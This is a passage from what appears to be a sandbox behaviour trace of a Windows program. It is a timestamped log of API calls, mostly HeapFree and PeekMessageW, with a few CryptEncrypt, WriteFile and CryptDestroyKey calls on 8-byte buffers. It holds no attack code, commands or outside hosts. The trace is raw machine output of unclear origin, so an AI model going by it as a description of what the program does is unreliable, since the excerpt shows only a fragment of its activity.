HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0203.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0203.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0203.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0203.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0203.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaba0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0203.254] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.254] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.254] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.254] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0203.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0203.255] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x8) returned 1 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.255] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0203.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.255] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0203.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.255] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0203.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.255] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0203.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.256] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.256] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.256] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.256] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.256] WriteFile (in: hFile=0x468, lpBuffer=0x2a71908*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71908*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0203.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.257] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0203.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.257] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0203.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.257] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.257] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0203.257] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.257] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0203.257] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0203.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0203.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0203.258] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0203.258] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.258] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.258] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0203.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.258] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0203.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.258] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0203.258] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.258] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0203.258] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.258] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.258] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.260] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.260] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0203.260] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.260] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.260] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0203.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.260] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0203.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.261] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0203.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.261] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0203.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.261] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.261] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0203.261] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.261] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.261] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb 